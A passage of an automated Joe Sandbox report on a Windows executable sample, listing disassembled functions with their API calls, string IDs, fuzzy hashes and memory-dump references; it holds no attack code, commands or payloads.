        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: a52a00048d4305b19cf3300e13c2c09a4be2aa5e497f14be9452da529889acce
        • Instruction ID: b5581386643e8e893a11a1e4206e42cd936ddc352d080cb9b927944ce6c35301
        • Opcode Fuzzy Hash: a52a00048d4305b19cf3300e13c2c09a4be2aa5e497f14be9452da529889acce
        • Instruction Fuzzy Hash: 68A001D6AB9102BCF21872617D17E7B021CC4E8B6AB31893EF812D84D1AA80184A2671
        Function 0013F6EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F6FC
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 2eda7b0cfe88278358407d4051718fd6fa70158001da75eb895437cb88da2701
        • Instruction ID: 8bc518e27482e136e50932c8f23971e0c9f9d6d2f2b08918352d2f87418aede6
        • Opcode Fuzzy Hash: 2eda7b0cfe88278358407d4051718fd6fa70158001da75eb895437cb88da2701
        • Instruction Fuzzy Hash: 02A002D55792027DF11861517D57D36111CC4E1B15771456EF521D44915A80194A1175
        Function 0012A880 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
        Download Yara Rule
        APIs
        • CloseHandle.KERNEL32(000000FF,?,?,0012A83D,?,?,?,?,?,001537FF,000000FF), ref: 0012A89B
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CloseHandle
        • String ID:
        • API String ID: 2962429428-0
        • Opcode ID: a21930b1bb7e56aba248eefb71e0e3c567eb0d2e9446ff0ea14ff8fa3af33276
        • Instruction ID: 05999521e818dde92c93206fded05a4f76b62715b486bce52c0fdfc0c26c5359
        • Opcode Fuzzy Hash: a21930b1bb7e56aba248eefb71e0e3c567eb0d2e9446ff0ea14ff8fa3af33276
        • Instruction Fuzzy Hash: 10F0E230081B219FEB308A24E858792B3E4AF12326F041B5ED0E2438E0D37069AE8B41

        Non-executed Functions

        Function 0013D410 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 233windowfileCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 001212F6: GetParent.USER32(?), ref: 0012132A
          • Part of subcall function 001212F6: GetDlgItem.USER32(00000000,00003021), ref: 0012133A
          • Part of subcall function 001212F6: SetWindowTextW.USER32(00000000,001545F4), ref: 00121350
        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0013D4A1
        • EndDialog.USER32(?,00000006), ref: 0013D4B4
        • GetDlgItem.USER32(?,0000006C), ref: 0013D4D0
        • SetFocus.USER32(00000000), ref: 0013D4D7
        • SetDlgItemTextW.USER32(?,00000065,?), ref: 0013D511
        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0013D548
        • FindFirstFileW.KERNEL32(?,?), ref: 0013D55E
          • Part of subcall function 0013BC1B: FileTimeToSystemTime.KERNEL32(?,?), ref: 0013BC2F
          • Part of subcall function 0013BC1B: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0013BC40
          • Part of subcall function 0013BC1B: SystemTimeToFileTime.KERNEL32(?,?), ref: 0013BC4E
          • Part of subcall function 0013BC1B: FileTimeToSystemTime.KERNEL32(?,?), ref: 0013BC5C
          • Part of subcall function 0013BC1B: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0013BC77
          • Part of subcall function 0013BC1B: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 0013BC9E
          • Part of subcall function 0013BC1B: _swprintf.LIBCMT ref: 0013BCC4
        • _swprintf.LIBCMT ref: 0013D5A7
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0013D5BA
        • FindClose.KERNEL32(00000000), ref: 0013D5C1
        • _swprintf.LIBCMT ref: 0013D610
        • SetDlgItemTextW.USER32(?,00000068,?), ref: 0013D623
        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0013D640
        • _swprintf.LIBCMT ref: 0013D673
        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0013D686
        • _swprintf.LIBCMT ref: 0013D6D0
        • SetDlgItemTextW.USER32(?,00000069,?), ref: 0013D6E3
          • Part of subcall function 0013C083: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0013C0A9
          • Part of subcall function 0013C083: GetNumberFormatW.KERNEL32(00000400,00000000,?,0016072C,?,?), ref: 0013C0F8
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberParentSpecificWindow__vswprintf_c_l
        • String ID: %s %s$REPLACEFILEDLG
        • API String ID: 2415798972-439456425
        • Opcode ID: ee7cda35943eb589b46738946c004c64f008ebb09f9eb8a3eb8ea5c7f88c8a4b
        • Instruction ID: 4c91ece0d9ac4e8e9351ce5402f549ab05bb4222c81850120db665ed833cd4c8
        • Opcode Fuzzy Hash: ee7cda35943eb589b46738946c004c64f008ebb09f9eb8a3eb8ea5c7f88c8a4b
        • Instruction Fuzzy Hash: FF71B2B2548304BBE7319BA4FC49FFB77EDEB8A700F040819B649D6490D775AA448772
        Function 00127AAF Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 337fileCOMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 00127AB4
        • _wcslen.LIBCMT ref: 00127B1D
        • _wcslen.LIBCMT ref: 00127B8E
          • Part of subcall function 00128704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00128713
          • Part of subcall function 00128704: GetLastError.KERNEL32 ref: 00128759
          • Part of subcall function 00128704: CloseHandle.KERNEL32(?), ref: 00128768
          • Part of subcall function 0012B470: DeleteFileW.KERNEL32(?,00000000,?,0012A438,?,?,?,?,0012892B,?,?,?,001537FF,000000FF), ref: 0012B481
          • Part of subcall function 0012B470: DeleteFileW.KERNEL32(?,?,?,00000800,?,0012A438,?,?,?,?,0012892B,?,?,?,001537FF,000000FF), ref: 0012B4AF
        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00127C43
        • CloseHandle.KERNEL32(00000000), ref: 00127C5F
        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00127DAB
          • Part of subcall function 0012B032: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00127ED0,?,?,?,00000000), ref: 0012B04C
          • Part of subcall function 0012B032: SetFileTime.KERNEL32(?,?,?,?), ref: 0012B100
          • Part of subcall function 0012A880: CloseHandle.KERNEL32(000000FF,?,?,0012A83D,?,?,?,?,?,001537FF,000000FF), ref: 0012A89B
          • Part of subcall function 0012B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,0012B5B5,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B8FA
          • Part of subcall function 0012B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0012B5B5,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B92B
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
        • API String ID: 3983180755-3508440684
        • Opcode ID: ea6c308046e623b469d37c8c262bee01408f475d80d7b02319f63fdf89c1e6ce
        • Instruction ID: 8df7c48ef7e09f191515ff915093c3e967377696581624b81d43fd61c6221798
        • Opcode Fuzzy Hash: ea6c308046e623b469d37c8c262bee01408f475d80d7b02319f63fdf89c1e6ce
        • Instruction Fuzzy Hash: 93C1C271904269AFDB21DB64EC85FEFB3A8AF14314F00455AF545E7282D730AAA4CBA1
        Function 0014EA9E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: __floor_pentium4
        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
        • API String ID: 4168288129-2761157908
        • Opcode ID: edc6b03b0b5daaad8a7d7d5386b6bf1e20df594a119017a64caaa9a6a2cc4a41
        • Instruction ID: 1a8e6f52e042a7f554d03b0601819b1c36020e5e9fadabf1180125f24099ed2e
        • Opcode Fuzzy Hash: edc6b03b0b5daaad8a7d7d5386b6bf1e20df594a119017a64caaa9a6a2cc4a41
        • Instruction Fuzzy Hash: 32C22871E046288FDB29CF28DD407EAB7B5EB84305F1541EAD84DE7250E778AE868F41
        Function 0012395A Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 666COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog_swprintf
        • String ID: CMT$h%u$hc%u
        • API String ID: 146138363-3282847064
        • Opcode ID: 57e9c35b5a477ae29a3cc496a037bb5f3879e0045366e424542354a2ab195840
        • Instruction ID: 5c5edc5d9ed39b29fba8c5000f89485e9962a2d75aae4dbd577c7397354a424b
        • Opcode Fuzzy Hash: 57e9c35b5a477ae29a3cc496a037bb5f3879e0045366e424542354a2ab195840
        • Instruction Fuzzy Hash: F042E871600264DFDF24DF74E891AE93BE5AF25300F04447DFC5A8B282DB74AA99CB61
        Function 00122EB6 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 804COMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 00122EBF
        • _strlen.LIBCMT ref: 0012348B
          • Part of subcall function 001315F9: __EH_prolog.LIBCMT ref: 001315FE
          • Part of subcall function 00132EC2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0012CF18,00000000,?,?), ref: 00132EDE
        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001235DD
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
        • String ID: CMT
        • API String ID: 1206968400-2756464174
        • Opcode ID: faa12da0aaea3564ed65f40650e8c3c275113084907b3059acb2f04bec687646
        • Instruction ID: ef1903654f6a1517be5da11bb2192122291c2aa9cad9495e94715bd152485cd4
        • Opcode Fuzzy Hash: faa12da0aaea3564ed65f40650e8c3c275113084907b3059acb2f04bec687646
        • Instruction Fuzzy Hash: 206239716002A48FDF19DF38E8956E93BE1BF25304F08457DFC6A8B282DB749A55CB60
        Function 001409FA Relevance: 6.1, APIs: 4, Instructions: 73COMMON
        Download Yara Rule
        APIs
        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00140A06
        • IsDebuggerPresent.KERNEL32 ref: 00140AD2
        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00140AF2
        • UnhandledExceptionFilter.KERNEL32(?), ref: 00140AFC
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
        • String ID:
        • API String ID: 254469556-0
        • Opcode ID: 1c9c4ea2fffed447644622d343a59577fdeef8add350092c26083186c815be99
        • Instruction ID: 4d9ed5187b4b9cbdf6f78b28a5ee682b3f2744745702e723df1b30490bd9a47b
        • Opcode Fuzzy Hash: 1c9c4ea2fffed447644622d343a59577fdeef8add350092c26083186c815be99
        • Instruction Fuzzy Hash: F8313675D0131CDBDB21EFA5D989BCDBBB8AF18304F1041AAE508AB250EB719AC48F04
        Function 0013F81F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • VirtualQuery.KERNEL32(80000000,0013F764,0000001C,0013F959,00000000,?,?,?,?,?,?,?,0013F764,00000004,00183D24,0013F9E9), ref: 0013F830
        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0013F764,00000004,00183D24,0013F9E9), ref: 0013F84B
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: InfoQuerySystemVirtual
        • String ID: D
        • API String ID: 401686933-2746444292
        • Opcode ID: 39bd5e04d30087735fa660d08452caae06cb50b71b24f4b6aa68faa21773abd2
        • Instruction ID: 21518048a47c5c20cef026e40152c796c88e8d2a62e26f2644b17de1b1350750
        • Opcode Fuzzy Hash: 39bd5e04d30087735fa660d08452caae06cb50b71b24f4b6aa68faa21773abd2
        • Instruction Fuzzy Hash: F401D832A00109ABCB18DE29DC05BDD7BA9AFD4324F08C134ED19DB154D734D9428680
        Function 00144FDF Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 001450D7
        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 001450E1
        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 001450EE
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled$DebuggerPresent
        • String ID:
        • API String ID: 3906539128-0
        • Opcode ID: 2041df7687dfedc1d6ec1129e53d789f8fb7a63a5becc200ecc1996d15f89ed9
        • Instruction ID: c72e688648639de149ad7522711c0f2e12269d594ba0167b62561b1035aefc24
        • Opcode Fuzzy Hash: 2041df7687dfedc1d6ec1129e53d789f8fb7a63a5becc200ecc1996d15f89ed9
        • Instruction Fuzzy Hash: D731C675901218ABCB21DF64DC89B9DBBB4BF18710F5041DAE90CA7261EB709FC58F44
        Function 0014C4F8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID: .
        • API String ID: 0-248832578
        • Opcode ID: 173bfc07dde675f7370d2f1832797ea97311e0a4211f5fafe08b95e254eca718
        • Instruction ID: 7fde380435eccf38c9e714e4f95787ff81b27cd85b28e19726115b232c710d81
        • Opcode Fuzzy Hash: 173bfc07dde675f7370d2f1832797ea97311e0a4211f5fafe08b95e254eca718
        • Instruction Fuzzy Hash: E3310571900249AFCB649E78CC84EFF7BBDDB85314F0441A8F819DB261E770AE458BA0
        Function 0014E5F0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
        • Instruction ID: 164898d0f67e2a2856d9d814cde5030b2099d97c4656e774e48114aac2e8eb46
        • Opcode Fuzzy Hash: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
        • Instruction Fuzzy Hash: B7020B71E002199FDF14CFA9C8906ADBBF1FF58324F258269D919E7294D731AA418B90
        Function 0013C083 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
        Download Yara Rule
        APIs
        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0013C0A9
        • GetNumberFormatW.KERNEL32(00000400,00000000,?,0016072C,?,?), ref: 0013C0F8
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: FormatInfoLocaleNumber
        • String ID:
        • API String ID: 2169056816-0
        • Opcode ID: f923d341d6650e601a13a7f7ad9b469012aa27872352040570323a718a12ca1a
        • Instruction ID: 4958e305904ceca91eac812c2d4f756eeab8002f2a135e176651a4cbb761583a
        • Opcode Fuzzy Hash: f923d341d6650e601a13a7f7ad9b469012aa27872352040570323a718a12ca1a
        • Instruction Fuzzy Hash: 6A017C3A140308BBD710DFA5EC45F9B77BCEF18715F009422FA04AB190E3B0A995CBA5
        Function 00127727 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
        Download Yara Rule
        APIs
        • GetLastError.KERNEL32(00127886,?,00000400), ref: 00127727
        • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00127748
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
